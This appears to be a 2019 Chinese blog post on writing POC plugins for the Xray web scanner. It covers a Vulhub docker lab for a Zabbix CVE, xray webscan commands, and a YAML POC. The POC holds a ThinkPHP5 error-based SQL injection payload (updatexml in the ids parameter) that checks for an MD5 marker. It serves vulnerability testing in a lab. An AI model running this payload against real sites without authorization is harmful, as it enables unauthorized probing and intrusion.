Xray写POC插件

漏洞环境

启用、关闭命令

# 启用环境
docker-compose up -d

环境关闭

docker-compose down

查看 WEB 应用容器

root@kali:/opt/vulhub/zabbix/CVE-2016-10134# docker ps
CONTAINER ID        IMAGE                        COMMAND                  CREATED             STATUS                      PORTS                  NAMES
b699f35aa2c8        vulhub/zabbix:3.0.3-server   "/docker-entrypoint.…"   30 minutes ago      Up 30 minutes (unhealthy)   162/udp, 10051/tcp     cve-2016-10134_agent_1
05cf05dacf6d        vulhub/zabbix:3.0.3-web      "/docker-entrypoint.…"   30 minutes ago      Up 30 minutes (healthy)     0.0.0.0:8080->80/tcp   cve-2016-10134_web_1
be0b0d3e74a7        mysql:5                      "docker-entrypoint.s…"   30 minutes ago      Up 30 minutes               3306/tcp, 33060/tcp    cve-2016-10134_mysql_1


# 意思是容器的80端口映射到主机的8080端口上
0.0.0.0:8080->80/tcp

资料

https://www.runoob.com/docker/docker-container-usage.html

https://vulhub.org/

https://github.com/Medicean/VulApps/

POC文档

工具

参考源码

Xray的POC插件测试

  • 只运行单个内置 POC

在 xray 中,所有的 poc 隶属于插件 phantasm, 所以使用 poc 时需要开启 phantasm 插件才可生效。--poc 参数指定本次运行的 poc,如不指定,将运行所有的内置 poc。

xray webscan --plugins phantasm --poc /home/test/1.yaml --url http://example.com/

加载 /home/test/pocs/ 所有的 POC:

xray webscan --plugins phantasm --poc "/home/test/pocs/*"

加载 /home/test/pocs/ 下包含 thinkphp 的 POC

xray webscan --plugins phantasm --poc "/home/test/pocs/*thinkphp*"

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
posted @ 2019-09-05 17:27  17bdw  阅读(2852)  评论(0编辑  收藏  举报